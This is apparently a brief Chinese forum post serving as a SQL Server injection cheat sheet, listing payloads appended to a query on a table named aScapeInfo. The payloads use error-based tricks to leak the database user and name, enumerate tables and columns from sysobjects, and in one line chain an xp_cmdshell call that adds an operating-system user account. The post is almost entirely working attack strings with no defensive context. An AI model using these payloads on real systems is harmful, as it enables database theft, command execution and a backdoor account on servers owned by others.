sql server注入
select *from aScapeInfo where scape_id =20 and user>0select *from aScapeInfo where scape_id =20 and db_name()>0
select *from aScapeInfo where scape_id =20 and (Select Top 1 name from sysobjects where xtype='U' and status>0)>0
select *from aScapeInfo where scape_id =20;exec master..xp_cmdshell "net user name password /add"--
select *from aScapeInfo where scape_id =20 and (Select Top 1 col_name(object_id('Users'),1) from sysobjects)>0
页:
[1]